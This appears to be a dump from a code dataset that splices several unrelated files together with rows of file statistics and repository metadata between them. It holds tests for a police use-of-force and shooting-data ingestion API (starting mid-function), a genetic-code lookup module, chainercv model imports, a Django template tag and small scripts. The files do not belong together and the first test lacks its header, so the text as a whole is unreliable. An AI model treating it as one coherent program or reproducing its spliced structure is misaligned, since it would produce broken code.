cleaner = Cleaners()
sent_uof = uof_data[0]
check_uof = UseOfForceIncidentIMPD.query.filter_by(opaque_id=sent_uof['opaqueId']).first()
assert check_uof.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_uof['occuredDate']
assert check_uof.division == cleaner.capitalize(sent_uof['division'])
assert check_uof.precinct == cleaner.capitalize(sent_uof['precinct'])
assert check_uof.shift == cleaner.capitalize(sent_uof['shift'])
assert check_uof.beat == cleaner.capitalize(sent_uof['beat'])
assert check_uof.disposition == sent_uof['disposition']
assert check_uof.officer_force_type == cleaner.officer_force_type(sent_uof['officerForceType'])
assert check_uof.use_of_force_reason == sent_uof['useOfForceReason']
assert check_uof.service_type == sent_uof['serviceType']
assert check_uof.arrest_made == sent_uof['arrestMade']
assert check_uof.arrest_charges == sent_uof['arrestCharges']
assert check_uof.resident_weapon_used == sent_uof['residentWeaponUsed']
assert check_uof.resident_injured == sent_uof['residentInjured']
assert check_uof.resident_hospitalized == sent_uof['residentHospitalized']
assert check_uof.officer_injured == sent_uof['officerInjured']
assert check_uof.officer_hospitalized == sent_uof['officerHospitalized']
assert check_uof.resident_race == cleaner.race(sent_uof['residentRace'])
assert check_uof.resident_sex == cleaner.sex(sent_uof['residentSex'])
assert check_uof.resident_age == cleaner.number_to_string(sent_uof['residentAge'])
assert check_uof.resident_condition == sent_uof['residentCondition']
assert check_uof.officer_identifier == sent_uof['officerIdentifier']
assert check_uof.officer_race == cleaner.race(sent_uof['officerRace'])
assert check_uof.officer_sex == cleaner.sex(sent_uof['officerSex'])
assert check_uof.officer_age == cleaner.number_to_string(sent_uof['officerAge'])
assert check_uof.officer_years_of_service == cleaner.number_to_string(sent_uof['officerYearsOfService'])
assert check_uof.officer_condition == sent_uof['officerCondition']
def test_post_mistyped_uof_data(self, testapp):
        ''' Mistyped UOF data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of UOF descriptions from the JSON test client
test_client = JSONTestClient()
uof_count = 1
uof_data = test_client.get_prebaked_uof(last=uof_count)
# The app expects number values to be transmitted as strings. Let's change them to integers.
uof_data[0]['residentAge'] = 28
uof_data[0]['officerAge'] = 46
uof_data[0]['officerYearsOfService'] = 17
# post the json to the UOF URL
response = testapp.post_json("/data/UOF", params={'month': 0, 'year': 0, 'data': uof_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == uof_count
# check the uof incident in the database against the data that was sent
cleaner = Cleaners()
sent_uof = uof_data[0]
check_uof = UseOfForceIncidentIMPD.query.filter_by(opaque_id=sent_uof['opaqueId']).first()
assert check_uof.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_uof['occuredDate']
assert check_uof.division == cleaner.capitalize(sent_uof['division'])
assert check_uof.precinct == cleaner.capitalize(sent_uof['precinct'])
assert check_uof.shift == cleaner.capitalize(sent_uof['shift'])
assert check_uof.beat == cleaner.capitalize(sent_uof['beat'])
assert check_uof.disposition == sent_uof['disposition']
assert check_uof.officer_force_type == cleaner.officer_force_type(sent_uof['officerForceType'])
assert check_uof.use_of_force_reason == sent_uof['useOfForceReason']
assert check_uof.service_type == sent_uof['serviceType']
assert check_uof.arrest_made == sent_uof['arrestMade']
assert check_uof.arrest_charges == sent_uof['arrestCharges']
assert check_uof.resident_weapon_used == sent_uof['residentWeaponUsed']
assert check_uof.resident_injured == sent_uof['residentInjured']
assert check_uof.resident_hospitalized == sent_uof['residentHospitalized']
assert check_uof.officer_injured == sent_uof['officerInjured']
assert check_uof.officer_hospitalized == sent_uof['officerHospitalized']
assert check_uof.resident_race == cleaner.race(sent_uof['residentRace'])
assert check_uof.resident_sex == cleaner.sex(sent_uof['residentSex'])
assert check_uof.resident_age == cleaner.number_to_string(sent_uof['residentAge'])
assert check_uof.resident_condition == sent_uof['residentCondition']
assert check_uof.officer_identifier == sent_uof['officerIdentifier']
assert check_uof.officer_race == cleaner.race(sent_uof['officerRace'])
assert check_uof.officer_sex == cleaner.sex(sent_uof['officerSex'])
assert check_uof.officer_age == cleaner.number_to_string(sent_uof['officerAge'])
assert check_uof.officer_years_of_service == cleaner.number_to_string(sent_uof['officerYearsOfService'])
assert check_uof.officer_condition == sent_uof['officerCondition']
def test_update_uof_data(self, testapp):
''' Updated UOF data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of UOF descriptions from the JSON test client
test_client = JSONTestClient()
uof_data = test_client.get_prebaked_uof(last=1)
# post the json to the UOF URL
response = testapp.post_json("/data/UOF", params={'month': 0, 'year': 0, 'data': uof_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked uof incident
updated_uof_data = test_client.get_prebaked_uof(first=1, last=2)
# Swap in the opaque ID from the first uof incident
updated_uof_data[0]["opaqueId"] = uof_data[0]["opaqueId"]
# The uof incident won't be a match unless these fields are the same
updated_uof_data[0]["officerIdentifier"] = uof_data[0]["officerIdentifier"]
updated_uof_data[0]["officerForceType"] = uof_data[0]["officerForceType"]
# post the json to the uof URL
response = testapp.post_json("/data/UOF", params={'month': 0, 'year': 0, 'data': updated_uof_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 1
assert response.json_body['added'] == 0
        # There's only one UOF incident in the database.
all_uof = UseOfForceIncidentIMPD.query.all()
assert len(all_uof) == 1
# check the uof incident in the database against the updated data that was sent
cleaner = Cleaners()
sent_uof = updated_uof_data[0]
check_uof = UseOfForceIncidentIMPD.query.filter_by(opaque_id=sent_uof['opaqueId']).first()
assert check_uof.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_uof['occuredDate']
assert check_uof.division == cleaner.capitalize(sent_uof['division'])
assert check_uof.precinct == cleaner.capitalize(sent_uof['precinct'])
assert check_uof.shift == cleaner.capitalize(sent_uof['shift'])
assert check_uof.beat == cleaner.capitalize(sent_uof['beat'])
assert check_uof.disposition == sent_uof['disposition']
assert check_uof.officer_force_type == cleaner.officer_force_type(sent_uof['officerForceType'])
assert check_uof.use_of_force_reason == sent_uof['useOfForceReason']
assert check_uof.service_type == sent_uof['serviceType']
assert check_uof.arrest_made == sent_uof['arrestMade']
assert check_uof.arrest_charges == sent_uof['arrestCharges']
assert check_uof.resident_weapon_used == sent_uof['residentWeaponUsed']
assert check_uof.resident_injured == sent_uof['residentInjured']
assert check_uof.resident_hospitalized == sent_uof['residentHospitalized']
assert check_uof.officer_injured == sent_uof['officerInjured']
assert check_uof.officer_hospitalized == sent_uof['officerHospitalized']
assert check_uof.resident_race == cleaner.race(sent_uof['residentRace'])
assert check_uof.resident_sex == cleaner.sex(sent_uof['residentSex'])
assert check_uof.resident_age == cleaner.number_to_string(sent_uof['residentAge'])
assert check_uof.resident_condition == sent_uof['residentCondition']
assert check_uof.officer_identifier == sent_uof['officerIdentifier']
assert check_uof.officer_race == cleaner.race(sent_uof['officerRace'])
assert check_uof.officer_sex == cleaner.sex(sent_uof['officerSex'])
assert check_uof.officer_age == cleaner.number_to_string(sent_uof['officerAge'])
assert check_uof.officer_years_of_service == cleaner.number_to_string(sent_uof['officerYearsOfService'])
assert check_uof.officer_condition == sent_uof['officerCondition']
def test_post_uof_data_near_match_does_not_update(self, testapp):
''' UOF data with the same ID but different details creates a new record.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of UOF descriptions from the JSON test client
test_client = JSONTestClient()
uof_data = test_client.get_prebaked_uof(last=1)
# post the json to the UOF URL
response = testapp.post_json("/data/UOF", params={'month': 0, 'year': 0, 'data': uof_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked uof incident
updated_uof_data = test_client.get_prebaked_uof(first=1, last=2)
# Swap in the opaque ID from the first uof incident
updated_uof_data[0]["opaqueId"] = uof_data[0]["opaqueId"]
# post the json to the uof URL
response = testapp.post_json("/data/UOF", params={'month': 0, 'year': 0, 'data': updated_uof_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
        # There are two UOF incidents in the database.
all_uof = UseOfForceIncidentIMPD.query.all()
assert len(all_uof) == 2
def test_post_ois_data(self, testapp):
''' New OIS data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of OIS descriptions from the JSON test client
test_client = JSONTestClient()
ois_count = 1
ois_data = test_client.get_prebaked_ois(last=ois_count)
# post the json to the OIS URL
response = testapp.post_json("/data/OIS", params={'month': 0, 'year': 0, 'data': ois_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == ois_count
# check the ois incident in the database against the data that was sent
cleaner = Cleaners()
sent_ois = ois_data[0]
check_ois = OfficerInvolvedShootingIMPD.query.filter_by(opaque_id=sent_ois['opaqueId']).first()
assert check_ois.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_ois['occuredDate']
assert check_ois.division == cleaner.capitalize(sent_ois['division'])
assert check_ois.precinct == cleaner.capitalize(sent_ois['precinct'])
assert check_ois.shift == cleaner.capitalize(sent_ois['shift'])
assert check_ois.beat == cleaner.capitalize(sent_ois['beat'])
assert check_ois.disposition == sent_ois['disposition']
assert check_ois.resident_race == cleaner.race(sent_ois['residentRace'])
assert check_ois.resident_sex == cleaner.sex(sent_ois['residentSex'])
assert check_ois.resident_age == cleaner.number_to_string(sent_ois['residentAge'])
assert check_ois.resident_weapon_used == cleaner.resident_weapon_used(sent_ois['residentWeaponUsed'])
assert check_ois.resident_condition == sent_ois['residentCondition']
assert check_ois.officer_identifier == sent_ois['officerIdentifier']
assert check_ois.officer_weapon_used == sent_ois['officerForceType']
assert check_ois.officer_race == cleaner.race(sent_ois['officerRace'])
assert check_ois.officer_sex == cleaner.sex(sent_ois['officerSex'])
assert check_ois.officer_age == cleaner.number_to_string(sent_ois['officerAge'])
assert check_ois.officer_years_of_service == cleaner.string_to_integer(sent_ois['officerYearsOfService'])
assert check_ois.officer_condition == sent_ois['officerCondition']
def test_post_mistyped_ois_data(self, testapp):
        ''' Mistyped OIS data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of OIS descriptions from the JSON test client
test_client = JSONTestClient()
ois_count = 1
ois_data = test_client.get_prebaked_ois(last=ois_count)
# The app expects number values to be transmitted as strings. Let's change them to integers.
ois_data[0]['residentAge'] = 28
ois_data[0]['officerAge'] = 46
# And it expects this number value to be transmitted as a number, so let's make it a string.
ois_data[0]['officerYearsOfService'] = "17"
# post the json to the OIS URL
response = testapp.post_json("/data/OIS", params={'month': 0, 'year': 0, 'data': ois_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == ois_count
# check the ois incident in the database against the data that was sent
cleaner = Cleaners()
sent_ois = ois_data[0]
check_ois = OfficerInvolvedShootingIMPD.query.filter_by(opaque_id=sent_ois['opaqueId']).first()
assert check_ois.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_ois['occuredDate']
assert check_ois.division == cleaner.capitalize(sent_ois['division'])
assert check_ois.precinct == cleaner.capitalize(sent_ois['precinct'])
assert check_ois.shift == cleaner.capitalize(sent_ois['shift'])
assert check_ois.beat == cleaner.capitalize(sent_ois['beat'])
assert check_ois.disposition == sent_ois['disposition']
assert check_ois.resident_race == cleaner.race(sent_ois['residentRace'])
assert check_ois.resident_sex == cleaner.sex(sent_ois['residentSex'])
assert check_ois.resident_age == cleaner.number_to_string(sent_ois['residentAge'])
assert check_ois.resident_weapon_used == cleaner.resident_weapon_used(sent_ois['residentWeaponUsed'])
assert check_ois.resident_condition == sent_ois['residentCondition']
assert check_ois.officer_identifier == sent_ois['officerIdentifier']
assert check_ois.officer_weapon_used == sent_ois['officerForceType']
assert check_ois.officer_race == cleaner.race(sent_ois['officerRace'])
assert check_ois.officer_sex == cleaner.sex(sent_ois['officerSex'])
assert check_ois.officer_age == cleaner.number_to_string(sent_ois['officerAge'])
assert check_ois.officer_years_of_service == cleaner.string_to_integer(sent_ois['officerYearsOfService'])
assert check_ois.officer_condition == sent_ois['officerCondition']
def test_update_ois_data(self, testapp):
''' Updated OIS data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of OIS descriptions from the JSON test client
test_client = JSONTestClient()
ois_data = test_client.get_prebaked_ois(last=1)
# post the json to the OIS URL
response = testapp.post_json("/data/OIS", params={'month': 0, 'year': 0, 'data': ois_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked ois incident
updated_ois_data = test_client.get_prebaked_ois(first=1, last=2)
# Swap in the opaque ID from the first ois incident
updated_ois_data[0]["opaqueId"] = ois_data[0]["opaqueId"]
# The ois incident won't be a match unless this field is the same
updated_ois_data[0]["officerIdentifier"] = ois_data[0]["officerIdentifier"]
# post the json to the ois URL
response = testapp.post_json("/data/OIS", params={'month': 0, 'year': 0, 'data': updated_ois_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 1
assert response.json_body['added'] == 0
        # There's only one OIS incident in the database.
all_ois = OfficerInvolvedShootingIMPD.query.all()
assert len(all_ois) == 1
# check the ois incident in the database against the updated data that was sent
cleaner = Cleaners()
sent_ois = updated_ois_data[0]
check_ois = OfficerInvolvedShootingIMPD.query.filter_by(opaque_id=sent_ois['opaqueId']).first()
assert check_ois.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_ois['occuredDate']
assert check_ois.division == cleaner.capitalize(sent_ois['division'])
assert check_ois.precinct == cleaner.capitalize(sent_ois['precinct'])
assert check_ois.shift == cleaner.capitalize(sent_ois['shift'])
assert check_ois.beat == cleaner.capitalize(sent_ois['beat'])
assert check_ois.disposition == sent_ois['disposition']
assert check_ois.resident_race == cleaner.race(sent_ois['residentRace'])
assert check_ois.resident_sex == cleaner.sex(sent_ois['residentSex'])
assert check_ois.resident_age == cleaner.number_to_string(sent_ois['residentAge'])
assert check_ois.resident_weapon_used == cleaner.resident_weapon_used(sent_ois['residentWeaponUsed'])
assert check_ois.resident_condition == sent_ois['residentCondition']
assert check_ois.officer_identifier == sent_ois['officerIdentifier']
assert check_ois.officer_weapon_used == sent_ois['officerForceType']
assert check_ois.officer_race == cleaner.race(sent_ois['officerRace'])
assert check_ois.officer_sex == cleaner.sex(sent_ois['officerSex'])
assert check_ois.officer_age == cleaner.number_to_string(sent_ois['officerAge'])
assert check_ois.officer_years_of_service == cleaner.string_to_integer(sent_ois['officerYearsOfService'])
assert check_ois.officer_condition == sent_ois['officerCondition']
def test_post_ois_data_near_match_does_not_update(self, testapp):
''' OIS data with the same ID but different details creates a new record.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of OIS descriptions from the JSON test client
test_client = JSONTestClient()
ois_data = test_client.get_prebaked_ois(last=1)
# post the json to the OIS URL
response = testapp.post_json("/data/OIS", params={'month': 0, 'year': 0, 'data': ois_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked ois incident
updated_ois_data = test_client.get_prebaked_ois(first=1, last=2)
# Swap in the opaque ID from the first ois incident
updated_ois_data[0]["opaqueId"] = ois_data[0]["opaqueId"]
# post the json to the ois URL
response = testapp.post_json("/data/OIS", params={'month': 0, 'year': 0, 'data': updated_ois_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
        # There are two OIS incidents in the database.
all_ois = OfficerInvolvedShootingIMPD.query.all()
assert len(all_ois) == 2
| 56.749395 | 127 | 0.699925 | 5,691 | 46,875 | 5.545423 | 0.053242 | 0.067619 | 0.034602 | 0.034855 | 0.904021 | 0.896575 | 0.886467 | 0.882157 | 0.865585 | 0.858677 | 0 | 0.007655 | 0.197419 | 46,875 | 825 | 128 | 56.818182 | 0.831211 | 0.167019 | 0 | 0.810811 | 0 | 0 | 0.137493 | 0.007583 | 0 | 0 | 0 | 0 | 0.540541 | 1 | 0.03861 | false | 0.073359 | 0.017375 | 0 | 0.057915 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
0fad4c466bf2bfdd0cbe20c856a8f434d8c265b0 | 176 | py | Python | challenge_1/python/ning/challenge_1.py | rchicoli/2017-challenges | 44f0b672e5dea34de1dde131b6df837d462f8e29 | [
"Apache-2.0"
] | 271 | 2017-01-01T22:58:36.000Z | 2021-11-28T23:05:29.000Z | challenge_1/python/ning/challenge_1.py | AakashOfficial/2017Challenges | a8f556f1d5b43c099a0394384c8bc2d826f9d287 | [
"Apache-2.0"
] | 283 | 2017-01-01T23:26:05.000Z | 2018-03-23T00:48:55.000Z | challenge_1/python/ning/challenge_1.py | AakashOfficial/2017Challenges | a8f556f1d5b43c099a0394384c8bc2d826f9d287 | [
"Apache-2.0"
] | 311 | 2017-01-01T22:59:23.000Z | 2021-09-23T00:29:12.000Z | def reverse_string(original_string):
return original_string[::-1]
original_string = input("Enter a string to be reversed > ")  # input() already returns a str in Python 3
print(reverse_string(original_string))
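# A quick illustrative sketch of the slice-based reversal above
# (example values are hypothetical):
#   reverse_string("hello")  # => "olleh" -- the -1 step walks the string backwards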
| 25.142857 | 64 | 0.767045 | 24 | 176 | 5.375 | 0.583333 | 0.434109 | 0.325581 | 0.418605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006452 | 0.119318 | 176 | 6 | 65 | 29.333333 | 0.825806 | 0 | 0 | 0 | 0 | 0 | 0.182857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0.25 | 0.5 | 0.25 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 7 |
0fb2223e04136b6d5add50420ab01f13e78cab6f | 5,354 | py | Python | helpers/gc_file_helpers.py | ibbad/dna-lceb-web | b4c1d4e121dfea992e072979bfdc0f313c781e32 | [
"Apache-2.0"
] | null | null | null | helpers/gc_file_helpers.py | ibbad/dna-lceb-web | b4c1d4e121dfea992e072979bfdc0f313c781e32 | [
"Apache-2.0"
] | null | null | null | helpers/gc_file_helpers.py | ibbad/dna-lceb-web | b4c1d4e121dfea992e072979bfdc0f313c781e32 | [
"Apache-2.0"
] | null | null | null | """
This module contains the helpers functions for reading genetic code table
information from json file.
"""
import json
# Read the list of genetic codes and associated files in a dictionary.
with open("gc_files/gc_file_associations.json") as gc_directory:
gc_file_associations = json.load(gc_directory)
def codon_to_aa(codon, gc=1):
"""
    This function returns the 3-letter notation, e.g. 'ala', for the amino
    acid corresponding to the given codon.
:param codon: Codon (string) e.g. AAA
:param gc: genetic code (Integer) default=1 i.e. standard_genetic_code
:return:
"""
try:
if str(gc) not in gc_file_associations.keys():
# No entry for the required genetic code
return None
# Read the file
with open(gc_file_associations.get(str(gc))) as gc_file:
gc_data = json.load(gc_file)
for key in gc_data.keys():
aa_data = gc_data.get(key)
if codon.upper() in aa_data["codons"]:
# found the codon, return AA key.
return key
# Could not find this codon in any AA's data.
return None
except Exception:
return None
def aa_to_codon(aa, gc=1):
"""
    This function returns the list of codons for the given amino acid
    according to the respective genetic code table.
:param aa: amino acid notation/ name (String) e.g. Full name e.g. Alanine or
3-letter notation e.g. Ala or single letter notation e.g. A
:param gc: genetic code (Integer) default=1 i.e. standard_genetic_code
:return:
"""
try:
if str(gc) not in gc_file_associations.keys():
# No entry for the required genetic code
return None
# Read the file for genetic code table information
with open(gc_file_associations.get(str(gc))) as gc_file:
gc_data = json.load(gc_file)
        # if the 3-letter notation is given
if len(aa) == 3:
if aa.lower() in gc_data.keys():
return gc_data.get(aa.lower())["codons"]
        # look up by full name or single-letter symbol
for key in gc_data.keys():
aa_data = gc_data.get(key)
if aa_data["name"].lower() == aa.lower() or \
aa_data["symbol"].lower() == aa.lower():
return aa_data["codons"]
# If nothing is found, return None
return None
except Exception:
return None
def get_aa_using_name(aa, gc=1):
"""
    This function returns a dictionary object containing the data for the
    given amino acid.
:param aa: amino acid notation/ name (String) e.g. Full name e.g. Alanine or
3-letter notation e.g. Ala or single letter notation e.g. A
:param gc: genetic code (Integer) default=1 i.e. standard_genetic_code
:return:
"""
try:
if str(gc) not in gc_file_associations.keys():
# No entry for the required genetic code
return None
# Read the file for genetic code table information
with open(gc_file_associations.get(str(gc))) as gc_file:
gc_data = json.load(gc_file)
        # if the 3-letter notation is given
if len(aa) == 3:
if aa.lower() in gc_data.keys():
return gc_data.get(aa.lower())
        # look up by full name or single-letter symbol
for key in gc_data.keys():
aa_data = gc_data.get(key)
if aa_data["name"].lower() == aa.lower() or \
aa_data["symbol"].lower() == aa.lower():
return aa_data
# If nothing is found, return None
return None
except Exception:
return None
def get_aa_using_codon(codon, gc=1):
"""
    This function returns a dictionary object containing the data for the
    amino acid corresponding to the given codon.
:param codon: Codon (string) e.g. AAA
:param gc: genetic code (Integer) default=1 i.e. standard_genetic_code
:return:
"""
try:
if str(gc) not in gc_file_associations.keys():
# No entry for the required genetic code
return None
# Read the file
with open(gc_file_associations.get(str(gc))) as gc_file:
gc_data = json.load(gc_file)
for key in gc_data.keys():
aa_data = gc_data.get(key)
if codon.upper() in aa_data["codons"]:
# found the codon, return AA key.
return aa_data
# Could not find this codon in any AA's data.
return None
except Exception:
return None
def get_synonymous_codons(codon, gc=1):
"""
    This function returns a list object containing the synonymous codons for
    the given codon.
:param codon: Codon (string) e.g. AAA
:param gc: genetic code (Integer) default=1 i.e. standard_genetic_code
:return:
"""
try:
if str(gc) not in gc_file_associations.keys():
# No entry for the required genetic code
return None
# Read the file
with open(gc_file_associations.get(str(gc))) as gc_file:
gc_data = json.load(gc_file)
for key in gc_data.keys():
aa_data = gc_data.get(key)
if codon.upper() in aa_data["codons"]:
# found the codon, return AA key.
return aa_data["codons"]
# Could not find this codon in any AA's data.
return None
except Exception:
return None
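# A minimal usage sketch, assuming the standard genetic code table (gc=1)
# exists under gc_files/ and stores the codon used below (whether codons are
# spelled as RNA or DNA depends on the table file):
#   codon_to_aa('GCT')            # => the 3-letter key of the matching amino acid, or None
#   aa_to_codon('Alanine')        # => that amino acid's list of codons, or None
#   get_synonymous_codons('GCT')  # => every codon mapped to the same amino acid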
| 33.254658 | 80 | 0.603661 | 765 | 5,354 | 4.101961 | 0.12549 | 0.042065 | 0.068834 | 0.026769 | 0.833333 | 0.833333 | 0.784895 | 0.784895 | 0.783939 | 0.783939 | 0 | 0.004047 | 0.307807 | 5,354 | 160 | 81 | 33.4625 | 0.842688 | 0.398207 | 0 | 0.855263 | 0 | 0 | 0.029674 | 0.01121 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065789 | false | 0 | 0.013158 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0fb6c4ff6e10136ea7e79c67b0b3b51ab26db1b6 | 488 | py | Python | chainercv/links/model/senet/__init__.py | souravsingh/chainercv | 8f76510472bc95018c183e72f37bc6c34a89969c | [
"MIT"
] | 1,600 | 2017-06-01T15:37:52.000Z | 2022-03-09T08:39:09.000Z | chainercv/links/model/senet/__init__.py | souravsingh/chainercv | 8f76510472bc95018c183e72f37bc6c34a89969c | [
"MIT"
] | 547 | 2017-06-01T06:43:16.000Z | 2021-05-28T17:14:05.000Z | chainercv/links/model/senet/__init__.py | souravsingh/chainercv | 8f76510472bc95018c183e72f37bc6c34a89969c | [
"MIT"
] | 376 | 2017-06-02T01:29:10.000Z | 2022-03-13T11:19:59.000Z | from chainercv.links.model.senet.se_resnet import SEResNet # NOQA
from chainercv.links.model.senet.se_resnet import SEResNet101 # NOQA
from chainercv.links.model.senet.se_resnet import SEResNet152 # NOQA
from chainercv.links.model.senet.se_resnet import SEResNet50 # NOQA
from chainercv.links.model.senet.se_resnext import SEResNeXt # NOQA
from chainercv.links.model.senet.se_resnext import SEResNeXt101 # NOQA
from chainercv.links.model.senet.se_resnext import SEResNeXt50 # NOQA
| 61 | 71 | 0.827869 | 70 | 488 | 5.671429 | 0.242857 | 0.229219 | 0.31738 | 0.405542 | 0.808564 | 0.808564 | 0.808564 | 0.808564 | 0.702771 | 0 | 0 | 0.029613 | 0.10041 | 488 | 7 | 72 | 69.714286 | 0.874715 | 0.069672 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 11 |
0ff3deb53709c55d527715512a2566807cfc64eb | 194 | py | Python | studio/templatetags/custom_tags.py | KishorBalgi/live-stream-studio-booking | 7b652cf24980f3c78920b83853a7cceabf6824d2 | [
"Apache-2.0"
] | 4 | 2022-02-06T05:21:50.000Z | 2022-02-28T14:35:31.000Z | studio/templatetags/custom_tags.py | KishorBalgi/live-stream-studio-booking | 7b652cf24980f3c78920b83853a7cceabf6824d2 | [
"Apache-2.0"
] | null | null | null | studio/templatetags/custom_tags.py | KishorBalgi/live-stream-studio-booking | 7b652cf24980f3c78920b83853a7cceabf6824d2 | [
"Apache-2.0"
] | 2 | 2022-02-04T17:10:07.000Z | 2022-02-17T06:16:10.000Z | from django import template
from django.urls import reverse
register = template.Library()
@register.simple_tag
def anchor(url_name, section_id):
return reverse(url_name) + '#' + section_id | 24.25 | 47 | 0.773196 | 27 | 194 | 5.37037 | 0.62963 | 0.137931 | 0.193103 | 0.22069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134021 | 194 | 8 | 47 | 24.25 | 0.863095 | 0 | 0 | 0 | 0 | 0 | 0.005128 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0.166667 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
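# A hypothetical template usage sketch (assumes a URL pattern named 'home'
# that resolves to "/" and that this module is loaded as 'custom_tags'):
#   {% load custom_tags %}
#   <a href="{% anchor 'home' 'contact' %}">Contact</a>  {# renders href="/#contact" #}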
ba0298b5b34b780363221f343d1aee71356756fc | 40 | py | Python | test.py | coush001/Seismic-Dimensionality-Reduction | 59e5b50a9fc0b023168375e9fd4a4b22bae1fa43 | [
"MIT"
] | null | null | null | test.py | coush001/Seismic-Dimensionality-Reduction | 59e5b50a9fc0b023168375e9fd4a4b22bae1fa43 | [
"MIT"
] | null | null | null | test.py | coush001/Seismic-Dimensionality-Reduction | 59e5b50a9fc0b023168375e9fd4a4b22bae1fa43 | [
"MIT"
] | null | null | null | def run():
    print('IMPORTED SUCCESS')
